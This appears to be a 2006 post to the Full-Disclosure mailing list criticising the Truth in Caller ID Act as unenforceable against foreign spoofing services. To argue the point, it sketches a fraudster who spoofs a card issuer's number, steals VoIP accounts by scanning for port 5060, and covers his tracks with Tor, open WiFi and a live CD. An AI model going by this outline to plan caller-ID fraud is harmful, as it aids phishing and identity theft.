want to cut this, Verizon, BellSouth and Level3 are as much to blame for not 
taking the proper checks.

Just something for though...


-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil infiltrated . net http://www.infiltrated.net

How a man plays the game shows something of his
character - how he loses shows all - Mr. Luckey 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Truths in Truth in Caller ID Act

2006-10-01 Thread J. Oquendo
So the United States government wants to pass the Truth in Caller ID act. 
Humorously it will do little do deter criminals from spoofing their caller ID 
and scamming innocent victims. Here is the rule/law followed by why it will 
fail:

It shall be unlawful for any person within the United States, in connection 
with any telecommunications service or VOIP service, to cause any caller 
identification service to transmit misleading or inaccurate caller 
identification information, with the intent to defraud or cause harm.

Re-read it a few times and let some common sense kick in. unlawful for any 
person within the United States, in connection with any telecommunications 
service or VOIP service, to cause any caller identification service to transmit 
misleading or inaccurate caller identification information What in this bill 
exactly deters someone from abroad to continue their activities? Firstly 
they're not bound by U.S. laws, secondly if their servers are abroad those 
servers are in their lawful means to do what is legally appropriate for their 
location.

Now argumentatively how will the United States seek to prosecute say a 
telemarketer from using a service abroad to traverse back into the U.S.? Let's 
re-read the letter of the law again shall we? unlawful for any person within 
the United States, etc., etc., to cause any caller identification, etc., etc. 
So how does caller ID change, is it cause by the telemarketer, the server 
sending out the caller ID information, or the provider of that server. 
Obviously the telemarketer led the server to change the information, but 
ultimately the provider dished out the number, hence the provider being the 
true culprit.

The more I read about this law/rule/prohibition, the more I scratch my head at 
it.

So let's now see how the government intends on tracking someone shall we?

CallerIDBusterFoobar.com is a server located in Moscow. They're hosted there, 
their provider is their, their uplink is in Russia, etc. Joe Smith is a scumbag 
thief interested in stealing the credit card information of a few good men. 
He lives in Boondock Arizona and spends much too much time thinking up scams. 
He signs up for an account at CallerIDBusterFoobar.com, assigns 800-DISCOVER as 
his caller ID and proceeds to scam countless people out of their information. 
With this information he sets up fradulent drops and pickups somewhere in 
Moldovia.

How will U.S. authorities track him down? They won't. They don't have access to 
the servers in Russia for starters, secondly how many people are reporting 
these crimes. Alright, let's be fair for a moment, someone at Discover 
discovers that the call actually originated from Russia. So what? Unless the 
foreign country is cooperating with U.S. authorities, there is little the 
United States government with all their so called legislation would be able to 
do.

Now let's take it a step further, Joe Smith decided to use Privoxy with a WiFi 
phone from an open network. He managed to steal a VoIP account while scanning a 
class A for port 5060 and leveraged someone's information. He always has used 
Tor and Privoxy on his personal distro of Linux on a CD so he knows that there 
will be no residue from his crimes due to him using this CD on this machine so 
he is scott free technologically.

How does the United States intend on stopping him again? I get it now, since 
the United States government in all of their mighty wisdom is passing this bill 
it is only obvious that criminals are going to respect U.S. laws, I mean after 
all those in government follow their own laws so why shouldn't a criminal.

Comments, criticism?

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil infiltrated . net http://www.infiltrated.net

How a man plays the game shows something of his
character - how he loses shows all - Mr. Luckey 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  1   2   >